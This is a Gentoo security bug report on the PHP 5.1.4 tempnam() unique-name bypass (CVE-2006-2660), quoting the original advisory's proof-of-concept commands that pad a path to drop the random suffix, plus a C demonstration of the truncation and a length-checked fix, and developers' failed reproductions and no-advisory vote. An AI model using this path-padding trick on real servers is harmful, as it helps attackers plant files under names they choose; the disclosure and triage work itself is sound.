Bug 136566 - dev-lang/php <= 5.1.4 tempnam() Bypass unique file name (CVE-2006-2660)
Summary: dev-lang/php <= 5.1.4 tempnam() Bypass unique file name (CVE-2006-2660)
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High normal
Assignee: Gentoo Security
URL: http://www.cve.mitre.org/cgi-bin/cven...
Whiteboard: B4 [noglsa] jaervosz
Keywords:
Depends on:
Blocks:
 
Reported: 2006-06-12 11:41 UTC by Nigel Stepp
Modified: 2006-07-25 12:34 UTC

See Also:
Package list:
Runtime testing required: ---

Description Nigel Stepp 2006-06-12 11:41:32 UTC
The CVE is under review, but it appears to be legitimate.

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
  Written: 22.5.2006
  Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
tempnam -- Create file with unique file name.

--- 1. tempnam() Bypass unique file name ---
In my latest advisory I published an issue, "Open Basedir Bypass". The function tempnam() requires 2 args.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

In PHP 5.1.4 there is a bug that allows you to create a file with any name.

---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE
---

You have created the file /www/temp/hacker.phpGQMqSE; "GQMqSE" is automatically added to the filename.
The problem exists because the path can't be longer than MAXPATHLEN. By default MAXPATHLEN is 1024 bytes.

--- 771-805 ---
PHP_FUNCTION(tempnam)
{
	zval **arg1, **arg2;
	char *d;
	char *opened_path;
	char *p;
	int fd;
	size_t p_len;

	if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
		WRONG_PARAM_COUNT;
	}
	convert_to_string_ex(arg1);
	convert_to_string_ex(arg2);

	if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
		RETURN_FALSE;
	}
	
	d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

	php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC);
	if (p_len > 64) {
		p[63] = '\0';
	}

	if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
		close(fd);
		RETVAL_STRING(opened_path, 0);
	} else {
		RETVAL_FALSE;
	}
	efree(p);
	efree(d);
}
--- 771-805 ---

So if you create a path like /www/../www/.. etc. such that

arg1+arg2=1023

the unique id is not added to the path.

Example:

---
cxib# php -r 'echo tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
 www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
 www/../www/../www/temp/hacker.php
---

= /www/temp/hacker.php

---
cxib# ls -la /www/temp/hacker*
-rw-------  1 cxib  cxib  0 May 22 23:33 /www/temp/hacker.php
-rw-------  1 cxib  cxib  0 May 22 23:26 /www/temp/hacker.phpGQMqSE
---


--- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

--- 3. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec ;]

--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
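The mechanism the advisory describes, a temp-file template built into a MAXPATHLEN-sized buffer losing its random tail once directory and prefix already fill that buffer, can be shown without PHP internals. The C program below is an added example, not code from PHP or from the advisory; it assumes MAXPATHLEN = 1024 as the advisory states and the usual "<dir>/<prefix>XXXXXX" mkstemp() template layout, and the probe() helper and the all-'a' directory names are constructed for the demonstration. It puts the unchecked builder beside a length-checked one that refuses before the tail can be lost.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#define MAXPATHLEN 1024          /* assumption: the default the advisory quotes */
#define TEMPLATE_SUFFIX "XXXXXX" /* the six placeholders mkstemp() randomises */

/* Unchecked: a bounded snprintf() silently drops what does not fit, and what
 * sits at the end of the template is exactly the XXXXXX tail. */
int build_template_unchecked(char *out, size_t outsz, const char *dir, const char *prefix) {
    snprintf(out, outsz, "%s/%s%s", dir, prefix, TEMPLATE_SUFFIX);
    return 0;
}

/* Checked: size the whole template (dir + '/' + prefix + XXXXXX + NUL) first
 * and refuse with ENAMETOOLONG before writing anything. */
int build_template_checked(char *out, size_t outsz, const char *dir, const char *prefix) {
    size_t need = strlen(dir) + 1 + strlen(prefix) + strlen(TEMPLATE_SUFFIX) + 1;
    if (need > outsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    snprintf(out, outsz, "%s/%s%s", dir, prefix, TEMPLATE_SUFFIX);
    return 0;
}

/* Post-condition a regression test can assert: the XXXXXX tail survived. */
int template_has_suffix(const char *tmpl) {
    size_t n = strlen(tmpl), s = strlen(TEMPLATE_SUFFIX);
    return n >= s && strcmp(tmpl + n - s, TEMPLATE_SUFFIX) == 0;
}

/* Helper on constructed input (dirlen 'a's): 1 = tail survived, 0 = truncated, -1 = checked builder refused. */
int probe(size_t dirlen, const char *prefix, int use_checked) {
    static char dir[MAXPATHLEN], tmpl[MAXPATHLEN];
    if (dirlen >= sizeof dir) return -1;
    memset(dir, 'a', dirlen);
    dir[dirlen] = '\0';
    if (use_checked)
        return build_template_checked(tmpl, sizeof tmpl, dir, prefix) < 0 ? -1 : template_has_suffix(tmpl);
    build_template_unchecked(tmpl, sizeof tmpl, dir, prefix);
    return template_has_suffix(tmpl);
}

int main(void) {
    printf("short dir, unchecked: %d\n", probe(100, "hacker.php", 0));
    printf("dir+'/'+prefix = 1023, unchecked: %d\n", probe(1012, "hacker.php", 0));
    printf("dir+'/'+prefix = 1023, checked: %d\n", probe(1012, "hacker.php", 1));
    return 0;
}
```

With a 10-byte prefix the tail survives up to a 1006-byte directory name and is cut from 1007 bytes on; the checked builder turns that same boundary into a hard error instead of a silently shortened name.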
Comment 2 Nigel Stepp 2006-06-12 12:23:25 UTC
Tried the PoC on php-4.4.2-pl2, and it does not appear to work there, at least.  I do not have access to 5.1.4 at the moment.
Comment 3 Nigel Stepp 2006-06-12 13:20:45 UTC
Tried the PoC on a freshly installed 5.1.4.  The cut-off point appears to be 4096, not 1024 (for me anyway).

As soon as the path goes over 4095 bytes, the temp file gets changed to '/tmp/<filename><random>'.

So, I'm not sure under what conditions this is supposed to work.

I'll let someone else with more authority switch to INVALID, if that is the case, however.
Comment 4 frilled 2006-06-12 13:24:07 UTC
stepp: Isn't that the point? Bloat the filename and get a file handle you can control?
Comment 5 Nigel Stepp 2006-06-12 13:29:37 UTC
No, perhaps I was unclear.  The filename is still not controllable.

For example:
tempnam("/www/..< pad to 4095 total >/www/temp/","hacker123.php");

results in /www/temp/hacker123.php3I2fgH or something similar

tempnam("/www/..< pad to 4096 total >/www/temp/","hacker1234.php");

results in /tmp/hacker1234.php3I2fgH or something similar.

The random string at the end is still there.
Comment 6 Luca Longinotti (RETIRED) gentoo-dev 2006-06-12 15:44:12 UTC
Add PHP Team to CC.
Best regards, CHTEKK.
Comment 7 Wolf Giesen (RETIRED) gentoo-dev 2006-06-12 22:27:26 UTC
stepp: I must be stupid here, but that's how tempnam() is supposed to work. Isn't the whole idea of the exploit to pad the directory with bloat until you reach MAXPATHLEN-strlen(wantedfile), which would give you a controllable file handle? At least that's what I see the exploit claims to do.
Comment 8 Wolf Giesen (RETIRED) gentoo-dev 2006-06-13 00:26:04 UTC
Ah, I got confused, obviously. So on your system the function falls back like in the case when the directory doesn't exist? I'll try to confirm this here.
Comment 9 Wolf Giesen (RETIRED) gentoo-dev 2006-06-13 02:19:51 UTC
I just tried with 5.1.4 (x86) from portage and get the same result as Nigel does (the function falls back to /tmp, and the random tail is still intact), so I'd count it as INVALID.
Comment 10 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-13 02:26:49 UTC
I had already checked this issue before; I had chosen not to file a bug. I would close it as "invalid" too.
Comment 11 Luca Longinotti (RETIRED) gentoo-dev 2006-06-20 13:33:00 UTC
What do we do here? Close or not? I can't reproduce it here either, on any of my systems, so closing it invalid seems right.
Best regards, CHTEKK.
Comment 12 Wolf Giesen (RETIRED) gentoo-dev 2006-06-20 14:22:17 UTC
I could neither and so I'd also suggest invalidating this one, unless anybody steps up to say it worked for him/her.
Comment 13 Luca Longinotti (RETIRED) gentoo-dev 2006-07-14 09:23:36 UTC
Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4. Upstream provided an explicit patch for this (so they were able to reproduce it somehow), and it was added to those releases.
Stabling of those two PHP versions can be handled in bug 133524.
Best regards, CHTEKK.
Comment 14 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-07-24 07:09:11 UTC
Seems like it is time for GLSA decision on this one as well.
Comment 15 Wolf Giesen (RETIRED) gentoo-dev 2006-07-24 07:19:21 UTC
Invalid, IMHO, not reproducible on x86 at least. Other arches? Else I vote "no".
Comment 16 Thierry Carrez (RETIRED) gentoo-dev 2006-07-25 12:31:36 UTC
Voting no, this bug is stupid. You don't give the untrusted party control over the path in tempnam; it doesn't work, and the impact is lame.
Comment 17 Stefan Cornelius (RETIRED) gentoo-dev 2006-07-25 12:34:08 UTC
yet another "no" and closing...